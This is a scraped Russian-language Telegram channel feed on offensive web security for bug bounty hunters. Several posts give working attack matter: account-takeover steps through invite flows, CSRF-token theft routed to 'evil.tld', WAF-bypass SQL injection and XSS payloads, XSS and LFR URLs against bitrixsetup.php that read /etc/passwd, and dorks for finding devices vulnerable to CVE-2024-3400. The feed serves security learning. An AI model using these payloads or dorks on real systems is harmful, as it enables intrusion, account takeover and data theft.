SHADOW:Group
11.6K subscribers
106 photos
47 videos
19 files
821 links
Чат: @shadow_chat_tg

Рекламу не размещаю.

Админ - @shdwpwn
Download Telegram
⌨️Как киношные хакеры испортили жизнь ИБ-специалистам

Многие из нас видели в кино кулхацкеров способных в пару кликов взломать любую систему. Вдобавок к этому сцены взлома сопровождаются звуковыми и визуальными эффектами, которые вызывают если не смех, то ироническую улыбку у всех, кто в теме.

В статье на Хабре автор решил развеять миф о всесильности хакеров и объяснить, как этот миф мешает внедрению культуры кибербезопасности в компаниях.

Ссылка на Habr
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥6
📨Немного про уязвимости в функциях регистрации и приглашения пользователей

Неоднократно сталкивался с подобным кейсом в различных компаниях:

🔹Используем функцию приглашения пользователя и указываем там свою резервную почту
🔹Получаем приглашение себе на резервную почту
🔹Переходим по ссылке из приглашения, задаем пароль, перехватываем запрос и изменяем адрес электронной почты в запросе через параметр "email" на почту жертвы
🔹Получаем аккаунт, зарегистрированный на чужую почту без подтверждения от её владельца.

Но как можно повысить импакт?

🔹попробовать подставить почту существующего пользователя, что может привести к смене его пароля и, как следствие, захвату аккаунта
🔹если предыдущий трюк не сработал, то можно еще проверить на CSRF. Недавно на багбаунти попался похожий кейс, где просто подстановка почты жертвы не работала, но при CSRF с куками жертвы позволяла поменять ему адрес почты и/или пароль без подтверждения
🔹попробовать зарегистрировать корпоративные учетки, например, такие как shdw@company.com, admin@company.com и т.д. Для корпоративных учеток может быть доступен дополнительный (в том числе админский) функционал, недоступный обычным пользователям.

#web #logic #ato
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥33👍6🤔1
🖥 Автоматизируем поиск CRLF

Наткнулся на пост, где автор вдохновился исследованием HTTP Request Splitting от @blackfan и решил накидать скрипт для детекта некоторых представленных там уязвимостей.

Подробнее про работу скрипта рассказано тут а сам код доступен на GitHub. А на скрине сверху, уже другой исследователь запилил шаблон для Bcheck, чтобы детектить это в Burp Suite.

Для эксплуатации уязвимой конечной точки можете обратиться к данному исследованию и помните, чтобы иметь хороший рабочий PoC при отправке - демонстрируйте импакт, а не уязвимость.

#web #crlf
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17
Forwarded from PurpleBear (Vadim Shelest)
Две недели назад вышел новый релиз Nuclei v3.2.0 от Project Discovery.

В новой версии добавили расширенную функциональность сканов с учетными данными, поддерживающую различные схемы аутентификации
nuclei -u http://example.com/ -secret-file example_auth.yaml


Authentication Types:
Static Authentication - статичные креды (username и password) для Basic Auth, API Key, Bearer Token, Custom Header, Cookie
Dynamic Authentication - OAuth2.0, когда статичные креды (username и password) используются для получения Session Tokens/Cookie, Custom Header

Secret file содержит учетные данные для аутентификации для ресурсов по совпадению значений domains и domains-regex, без необходимости изменять уже существующие шаблоны

static:
# 1. Basic Auth based auth
- type: basicauth
domains:
- scanme.sh
username: test
password: test
# 2. Bearer Token based auth
- type: bearertoken
domains-regex:
- .*scanme.sh
- .*example.com
token: test
dynamic:
- template: /path/to/wordpress-login.yaml
variables:
- name: username
value: test
- name: password
value: test
type: cookie
domains:
- blog.example.com
cookies:
- raw: "{{wp-global-cookie}}"
- raw: "{{wp-admin-cookie}}"
- raw: "{{wp-plugin-cookie}}"


В следующих релизах авторы планируют также добавить интеграцию с HashiCorp Vault, AWS Secrets Manager и 1Password
👍12
⭕️Про сlient-side path traversal

Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.

Например, если приложение через fetch() добавляет заголовок csrfToken при обращении к /api/user, то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на /api/user/../redirect?to=evil.tld/corsAllow

Еще больше практических примеров использования path traversal на стороне клиента вы можете узнать из статей, представленных ниже:

Practical Example Of Client Side Path Manipulation
From an Innocent Client-Side Path Traversal to Account Takeover
Client-side path traversal vulnerability class explained - $6,580 GitLab bug bounty

Practical Client Side Path Traversal Attacks
The power of Client-Side Path Traversal: How I found and escalated 2 bugs through "../"

#web #cspt
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22🔥4
Forwarded from MavisGPT
С двух ног врываюсь в фаззинг/экплоит дев браузеров. сразу получеными двумя CVE(UXSS и Adress Bar Spofing) и футболкой по почте. На самом деле потребовалось полтора года на попытки и освоение движка V8, и умение фаззить. А оказалось достаточно все просто, с нуля написать фаззер, благо если знаешь теория пишется быстро, выставление санитайзероми и https://github.com/YulinSec/ChatGPTScanner как проверка на действительно полезные вылеты программ. Наконец нормально рабочие примение LLM в ИБ. Схема проста, фаззер фаззит, дает тебе вылеты, тот скрипт проверяет на ценность вылетов, при легком изменение кода сам пишет poc. Тебе только проверять на действительные ценные poc.
В частности следующий апдейт хрома будет из за меня, так что извините.
PS? Этот канал был создан что бы выкладывать свои пет проекты/идеи которые всплывают в голове.
🔥32👍4
🌐 Увеличиваем Attack Surface на пентесте периметра

На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях приходится recon-ить все ресурсы компании самостоятельно. Зачастую компании сами не подозревают, какие ресурсы у них могут «торчать наружу».

Аналогичная ситуация ждет вас и на багбаунти, когда у программы широкий скоуп и грамотная разведка и сбор ресурсов компании может помочь найти вам то, что не нашли другие.

Из статьи ниже вы поймете на практическом примере как производить сбор IP-адресов заказчика, а также проводить горизонтальный и вертикальный поиск доменов.

Читать статью

#web #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥2
Forwarded from HaHacking
🗂 #заметки #web #offense

➡️Rather old, but gold информация, которая до сих пор пригождается при анализе защищённости веб-приложений;


   🧩  BlackFan/content-type-research

Манипуляция Content-Type для эксплуатации некорректного парсинга и, следовательно, для обхода WAF, внедрения полезной нагрузки для XSS и проведения CSRF;

Базовый пример идеи из репозитория:
Content-Type: application/x-www-form-urlencoded
Body: q=' union select '1

➡️ App' union select 1'
➡️ WAF: ' union select 1'

Content-Type: application/json
Body: {"q":"' \u0075nion \u0073elect '1"}

➡️ App' union select 1'
➡️ WAF: ' union select 1'

Content-Type: application/x-www-form-urlencoded;/json
Body: {"q":"' \u0075nion \u0073elect '1"}

➡️ App: ' union select 1'
➡️ WAF: {"q":"' \u0075nion \u0073elect '1"}


💻 BlackFan/content-type-research/ct-tricks – подобные трюки в зависимости от особенностей конкретной технологии;

💻 BlackFan/content-type-research/XSS – примеры Content-Type, которые могут быть использованы для внедрения полезной нагрузки для эксплуатации XSS;

💻 BlackFan/content-type-research/Browsers – примеры Content-Type, которые могут быть использованы для cross-origin запросов в зависимости от браузера;


   🧩  BlackFan/client-side-prototype-pollution

💻 BlackFan/client-side-prototype-pollution/pp – перечень технологий, уязвимых к Prototype Pollution, с указанием CVE, уязвимого фрагмента кода и PoC;

💻 BlackFan/client-side-prototype-pollution/gadgets – перечень гаджетов для списка технологий с указанием JS фингерпринта, уязвимого фрагмента кода и PoC;
//  Подобное от PortSwigger: XSS/Cheat-Sheet#Prototype Pollution



   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥6
😱 Уязвимости в установщике Битрикс

Для установки Битрикса есть скрипт bitrixsetup.php, который разработчики рекомендуют удалять после установки, но, как выяснилось, не все это делают. При обнаружении этого скрипта основной вектор атаки, который приходит в голову, это переустановить CMS и загрузить веб-шелл через административную панель.

Иногда админы просто ограничивают права на запись в директорию и считают, что этого будет достаточно, однако данный скрипт сам по себе оказался уязвим к XSS и LFR:

XSS:
https://target.com/bitrixsetup.php?action=UNPACK&filename=<img src='' onerror=alert(document.domain)>

LFR:
https://target.com/bitrixsetup.php?action=UNPACK&filename=../../../../etc/passwd 


Более подробно читайте в статье на хабре.

#web #bitrix #xss #lfr
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥9
😈 Social Engineeringсамый крупный ресурс в Telegram, посвященный Информационной Безопасности, OSINT и Cоциальной Инженерии.

Особое внимание стоит обратить на следующую информацию:

Собственный бот, который проверит Ваш файл 70 антивирусами одновременно.
Наш репозиторий с подборкой материала для изучения компьютерных сетей.
Коллекция инструментов и ресурсов для поиска информации о человеке в 2024 году.
Актуальные методы социальной инженерии и профайлинга.
Бесплатные курсы для изучения ИБ и OSINT.

Вас ждёт только актуальный и качественный материал. @S.E.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁2🤔2👍1🤯1
Тем временем, число подписчиков на канале перевалило за 10к! Спасибо всем за то, что читаете, шарите посты по другим каналам и чатикам, а также делитесь фидбеком и интересными находками, вы крутые!❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
43👍7🔥7
👍 Обход защиты от XSS

Статья по байпассу средств защиты от XSS для некоторых кейсов. Как итог, получаем несколько довольно универсальных пэйлодов, которые могут пригодится вам и в других случаях (мне пригодились):

Imperva & Incapsula:

<details/open/id="&quot;"ontoggle=[JS]>

Amazon Cloudfront

<details/open/id="&quot;"ontoggle=[JS]>

Akamai

<details open id="' &quot;'"ontoggle=[JS]>

Еще больше байпассов для XSS доступно в репозитории на GitHub.

#web #xss #waf #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25🔥6
Forwarded from Пост Импакта
Спасибо @ValyaRoller за приглашение на подкаст! Подписывайтесь на его замечательный канал @pigPeter

Кому интересен кейс с paypal, тут подробнее можно почитать: t.me/postImpact/6

такой же кейс все еще работает с TripAdvisor так что можете счейнить до high с любой xss на поддоменах: Pattern.compile("^(?:https?\\:\\/\\/(?:[A-Za-z0-9_\\-]+\\.(dhcp(\\-[A-Za-z]+)?\\.([A-Za-z0-9_\\-]+\\.corp\\.)?|(nw\\.)?dev(\\-[A-Za-z]+)?\\.|cmc\\.|d\\.)?)?tripadvisor\\.(?:com|(?:[a-z]{2})|(?:(?:co|com)\\.[a-z]{2})))?\\/.*$");

Вообще многие сдают не раскручивая — сдают medium вместо high теряя значительное bounty.

Еще кейс с dyson не попал в видео, там я рассказывал про то что у них одна тестовая репа попала в публичный bitbucket (всего на пару часов), а там был логин/пароль QA. И пароль подходил к его рабочему outlook , внутреннему bitbucket и slack. Как итог - доступ к главному домену dyson.com и сорцам. Так что нужны второй фактор и еще фингерпиринты к браузерам/ip.

про мою первую багу в ICQ, на самом деле 150$ (отчет оказался частично раскрытым) — https://hackerone.com/reports/373909
👍8🔥21
🌐 Palo Alto GlobalProtect - OS Command Injection

Уязвимость выполнения команд (CVE-2024-3400), затрагивает функцию GlobalProtect в нескольких последних версиях PAN-OS - программного обеспечения, которое работает на большинстве современных устройств брандмауэра Palo Alto Networks.

GlobalProtect - это функция VPN PAN-OS, что приводит к наличию множества уязвимых устройств подключенных к Интернету. Подробный анализ читайте по ссылке.

Дорк Shodan:
http.html_hash:-1303565546

Дорк Censys:
services.http.response.body_hash="sha1:28f1cf539f855fff3400f6199f8912908f51e1e1

Дорк Fofa:
icon_hash="-631559155"

Дорк Zoomeye
app:"Palo Alto Networks firewall httpd"

Дорк Hunter.how
product.name="GlobalProtect Portal"

Ссылка на PoC
Ссылка на шаблон Nuclei

#web #rce #dork #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15
Forwarded from S.E.Reborn
🪙 Bug Bounty Blueprint: Руководство для начинающих.

• Очень информативное руководство по Bug Bounty, которое содержит полезные инструменты, лабы, ресерчи, кейсы из жизни и еще очень много полезных ссылок.

➡️ https://blog.securitybreached.org/

#BB
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4
Forwarded from Path Secure (CuriV)
Привет!

Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.

Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.

Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.

Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️

https://github.com/curiv/russian-offensive-security-questions

#pentest #interview #repository
👍214🔥4😁1
💥 Как мы превратили DOM XSS в изощренный захват аккаунта в один клик, оцененный в $8000

Увлекательное кейс-исследование, где авторам удалось превратить простой, на первый взгляд, DOM XSS в изощренный захват аккаунта в один клик. В статье рассказано о мыслительном процессе, преградах, с которыми пришлось столкнуться, и о том, как их преодолеть, чтобы получить полностью рабочий эксплойт.

Читать статью

#web #xss #ato
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥28🤯7👍2